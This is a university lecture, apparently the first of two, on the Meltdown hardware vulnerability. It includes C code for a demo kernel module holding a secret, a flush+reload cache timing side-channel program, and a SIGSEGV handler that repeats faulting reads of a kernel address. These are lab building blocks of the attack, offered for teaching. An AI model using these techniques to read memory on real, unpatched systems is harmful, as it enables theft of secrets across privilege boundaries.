Meltdown Attack

Meltdown is a hardware vulnerability that affected Intel x86 CPUs, IBM POWER CPUs, and some ARM-based CPUs. It allowed a malicious process to read all memory, including memory it was not authorized to access.

Meltdown affected a wide range of systems. At the time of disclosure (2018), this included all devices running any but the most recent and patched versions of iOS, Linux, macOS, or Windows. Accordingly, many servers and cloud services were impacted, as well as a potential majority of smart devices and embedded devices using ARM-based CPUs (mobile devices, smart TVs, printers and others), including a wide range of networking equipment.

It was disclosed in conjunction with another exploit, Spectre, with which it shares some characteristics. The Meltdown and Spectre vulnerabilities were considered "catastrophic" by security analysts. The vulnerabilities were so severe that security researchers initially believed the reports to be false.

In 2018, Intel reportedly added hardware and firmware mitigations for the Spectre and Meltdown vulnerabilities to its latest processors.

Over the next two lectures, we will show how the Meltdown attack works.

Acknowledgements.

The lecture notes are inspired by the SEED Labs.

Testing environments.

The attack has been tested under the following environments:

VMware Workstation 15 Player
OS: Ubuntu 16.04.1, 64-bit (kernel version 4.4.0-31-generic)
CPU: Intel Core i5-6300U (released in 2015)

Setting the Context: Reading Kernel Memory?

We first create and insert a kernel module that holds some secret data. Then, we create an attack program that tries to read that secret data from user space.

Creating and inserting a kernel module

First, let's look at the following kernel module:


// mdown_kernel.c
#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/init.h>
#include <linux/vmalloc.h>
#include <linux/version.h>
#include <linux/proc_fs.h>
#include <linux/seq_file.h>
#include <linux/uaccess.h>

MODULE_LICENSE("GPL");   // avoids the "module license unspecified" taint

// The secret lives in kernel memory; user programs cannot read it directly.
static char secret[] = "Go Navy!";
static void* buf;

static int mdown_open(struct inode *inode, struct file *file)
{
   return single_open(file, NULL, PDE_DATA(inode));
}

// Reading /proc/secret_data copies the secret into a kernel buffer.
// Nothing is returned to user space; the read only makes the kernel
// touch the secret, which brings it into the CPU cache.
static ssize_t mdown_read(struct file *filp, char __user *buffer,
                          size_t length, loff_t *offset)
{
   memcpy(buf, &secret, sizeof(secret));
   return sizeof(secret);
}

static const struct file_operations mdown_fops =
{
   .owner = THIS_MODULE,
   .open = mdown_open,
   .read = mdown_read,
   .llseek = seq_lseek,
   .release = single_release,
};

static __init int mdown_init(void)
{
   // print the address of the secret into the kernel message buffer
   printk(KERN_INFO "secret data address: 0x%p\n", &secret);

   buf = vmalloc(sizeof(secret));
   if (!buf)
      return -ENOMEM;

   // create the world-readable entry /proc/secret_data
   if (!proc_create_data("secret_data", 0444, NULL, &mdown_fops, NULL)) {
      vfree(buf);
      return -ENOMEM;
   }

   return 0;
}

static __exit void mdown_cleanup(void)
{
   remove_proc_entry("secret_data", NULL);
   vfree(buf);
}

module_init(mdown_init);
module_exit(mdown_cleanup);

To compile the module, we create the following Makefile:

KVERS = $(shell uname -r)
obj-m += mdown_kernel.o
all:
	make -C /lib/modules/$(KVERS)/build M=$(CURDIR) modules

Now, let's compile the code.

~$ make
make -C /lib/modules/4.4.0-31-generic/build M=/home/choi/it432 modules
make[1]: Entering directory '/usr/src/linux-headers-4.4.0-31-generic'
  Building modules, stage 2.
  MODPOST 1 modules
make[1]: Leaving directory '/usr/src/linux-headers-4.4.0-31-generic'

This produces mdown_kernel.ko. We can insert this module into the kernel as follows:

~$ sudo insmod mdown_kernel.ko

Note that mdown_init calls printk to write the address of the secret into the kernel message buffer. We can view this message with the dmesg command:

~$  dmesg | grep secret
[  400.054528] secret data address: 0xffffffffc0232000

Naive trial that won't work

Let's try to read the data at address 0xffffffffc0232000.


// atk_naive.c
#include <stdio.h>

int main()
{
   char* p;
   printf("address: ");
   if (scanf("%p", (void**)&p) != 1)
      return 1;
   // %p already prints the "0x" prefix
   printf("reading address at %p...\n", (void*)p);
   printf("%d %c\n", *p, *p);   // reading a kernel address raises SIGSEGV

   return 0;
}

Let's compile and run the program:

~$ gcc atk_naive.c -o atk_naive
~$ ./atk_naive
address: 0xffffffffc0232000
reading address at 0xffffffffc0232000...
Segmentation fault (core dumped)

As expected, a normal program cannot read any data in the kernel region.

How can a normal program read kernel data? Is this even possible?

The Meltdown attack answers this question affirmatively!

Interesting Puzzle

Consider code that performs the following steps:

Prepare an array.
Read a number (from 0 to 9) from a secret file.
Change the array based on the number.
Change the array back to its original state.

In particular, consider the code below. Can you figure out the secret number?

You may add code at the places marked // ???? code ????.
You are not allowed to read the secret file again.
You are not allowed to store the number in some other variable.


#include <stdio.h>

int main()
{
   // 1. Prepare an array
   char A[10*4096];
   for(int i=0; i<10; i++)
     A[i*4096] = 1;

   // 2. Read a number from a secret file
   int n;
   FILE* f = fopen("secret.txt", "r");
   if (f == NULL)
      return 1;
   if (fscanf(f, "%d", &n) != 1 || n < 0 || n > 9) {
      fclose(f);
      return 1;   // the secret must be a digit from 0 to 9
   }
   fclose(f);

   // ???? code ????

   // 3. Change the array based on the number
   A[n*4096] = 2;

   // 4. Revert the array state
   A[n*4096] = 1;
   n = -1;

   // ???? code ????
   return 0;
}

Solution to the puzzle

The idea is as follows:

The cache side-channel attack!

What is the side information that the cache leaks?

A recently accessed item resides in the cache.
Accessing an item that is in the cache is fast.
Accessing an item that is not in the cache is slower, because it must be fetched from main memory.

So, here is the code we will add:

Before changing the array, flush every candidate item A[i*4096] (i = 0, ..., 9) from the cache.
At the end, do the following:
- For each item, access it and measure the access time.
The item with the minimum access time is probably the secret number!

Here is a sample run of the solution program (sol_puzzle.c, listed below):

~$ gcc sol_puzzle.c
~$ ./a.out
Access time for array[0*4096]: 184 CPU cycles
Access time for array[1*4096]: 220 CPU cycles
Access time for array[2*4096]: 194 CPU cycles
Access time for array[3*4096]: 218 CPU cycles
Access time for array[4*4096]: 218 CPU cycles
Access time for array[5*4096]: 212 CPU cycles
Access time for array[6*4096]: 36 CPU cycles
Access time for array[7*4096]: 222 CPU cycles
Access time for array[8*4096]: 194 CPU cycles
Access time for array[9*4096]: 218 CPU cycles
~$ cat secret.txt
6

Item 6 has the minimum access time (36 CPU cycles, versus 184 to 222 cycles for the others), which matches the secret number!


// sol_puzzle.c
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#include <emmintrin.h>   // _mm_clflush
#include <x86intrin.h>   // __rdtscp

int main()
{
   // 1. Prepare an array
   char A[10*4096];
   for(int i=0; i<10; i++)
     A[i*4096] = 1;

   // 2. Read a number from a secret file
   int n;
   FILE* f = fopen("secret.txt", "r");
   if (f == NULL)
      return 1;
   if (fscanf(f, "%d", &n) != 1 || n < 0 || n > 9) {
      fclose(f);
      return 1;   // the secret must be a digit from 0 to 9
   }
   fclose(f);

   // *********** Flush the cache for every element *********
   for(int i=0; i<10; i++)
     _mm_clflush(&A[i*4096]);

   // 3. Change the array based on the number
   A[n*4096] = 2;

   // 4. Revert the array state
   A[n*4096] = 1;
   n = -1;

   // **** Measure access time for each possibility ****
   volatile char* addr;   // volatile: the compiler must keep the timed read
   unsigned int aux;      // filled in by __rdtscp; not used
   uint64_t time1, time2;

   for(int i=0; i<10; i++) {
     addr = &A[i*4096];
     time1 = __rdtscp(&aux);
     (void)*addr;         // the access being timed
     time2 = __rdtscp(&aux);
     printf("Access time for array[%d*4096]: %llu CPU cycles\n",
            i, (unsigned long long)(time2 - time1));
   }

   return 0;
}

Of course, it is not yet clear how to use this cache side channel to read kernel memory. But, at least, it is a good direction. We will revisit this idea and develop it into the actual attack in the next lecture.

Making the Probing Program Avoid Crashing

Another problem we have to deal with is that our probing program simply crashes. This is because the program receives the SIGSEGV (segmentation fault) signal, whose default action is to terminate the process. By handling this signal, we can make the program continue instead of crashing.

Signal handler and `sigaction()`

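The function sigaction() allows the programmer to specify a signal handler for a given signal, but it also gives the programmer finer control over how the signal is handled, for example which signals are blocked while the handler runs, and flags such as SA_NODEFER.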

The declaration of sigaction() is as follows:


int sigaction(int signum, const struct sigaction *act, struct sigaction *oldact);

The first argument is the signal to be handled. The second argument points to a struct sigaction describing the new action, and the third, if not NULL, receives the previous action. The handler function and additional options are set in struct sigaction, which has the following members:


struct sigaction {
  void     (*sa_handler)(int);
  void     (*sa_sigaction)(int, siginfo_t *, void *);
  sigset_t   sa_mask;
  int        sa_flags;
};

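The first two fields, sa_handler and sa_sigaction, are pointers to signal handler functions. sa_handler has the same type as the handlers we've been using previously: it receives only the signal number. sa_sigaction is used instead when SA_SIGINFO is set in sa_flags, and it additionally receives a siginfo_t describing the signal. On some systems, including glibc, the two fields share storage, so set only one of them. sa_mask lists additional signals to block while the handler runs, and sa_flags modifies how the signal is handled.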

We are going to use the SA_NODEFER flag. See the following from the man page:

SA_NODEFER

...a further instance of the signal may be delivered to the thread while it is executing the handler...

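By default, the signal being handled is blocked while its handler runs. A second SIGSEGV raised inside the handler would then arrive while SIGSEGV is blocked, and on Linux the kernel responds by terminating the process. SA_NODEFER avoids this, so we can do something like the following: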

Access to the kernel data → SIGSEGV
- Inside a handler function due to the signal.
- In the handler, access to the kernel data → SIGSEGV
  - Inside a handler function due to the signal.
  - In the handler, access to the kernel data → SIGSEGV
    - Inside a handler function due to the signal.
    - ...

Why do we need this? Because the access time is a noisy measurement. To estimate it more accurately, we need to measure it over many iterations. In the code below, the global variable trial controls the number of iterations.

Modified code

Now, let's modify the program atk_naive.c. The following program accesses the kernel data 5 times and then exits normally.


// atk_repeat.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <signal.h>

int trial = 0;
char* p;

void try(void)
{
  trial++;
  printf("reading address at %p...\n", (void*)p);
  printf("%d %c\n", *p, *p);   // raises SIGSEGV for a kernel address
}

// SIGSEGV handler: try again until 5 trials have been made.
void catch_segv(int signum)
{
  if (trial < 5)
    try();     // faults again; SA_NODEFER lets the nested signal through
  else
    exit(0);   // now it's time to end the program
}

int main()
{
   printf("address: ");
   if (scanf("%p", (void**)&p) != 1)
      return 1;

   struct sigaction action;
   memset(&action, 0, sizeof(action));
   sigemptyset(&action.sa_mask);
   action.sa_flags = SA_NODEFER;
   action.sa_handler = catch_segv;
   sigaction(SIGSEGV, &action, NULL);

   try();
   return 0;
}

To make things simpler, the code uses global variables:

trial: This keeps track of how many trials have been attempted so far.
p: The address that the user provides.

The function try() reads from the address p. For a kernel address, this always raises a SIGSEGV signal.

Due to the sigaction call in main(), the SIGSEGV signal is handled by catch_segv(), which calls try() again. As explained above, this repeats recursively, with each fault handled by a new nested handler call, until trial reaches 5 and the program exits.

The sample run is shown below:

~$ ./atk_repeat
address: 0xffffffffc0232000
reading address at 0xffffffffc0232000...
reading address at 0xffffffffc0232000...
reading address at 0xffffffffc0232000...
reading address at 0xffffffffc0232000...
reading address at 0xffffffffc0232000...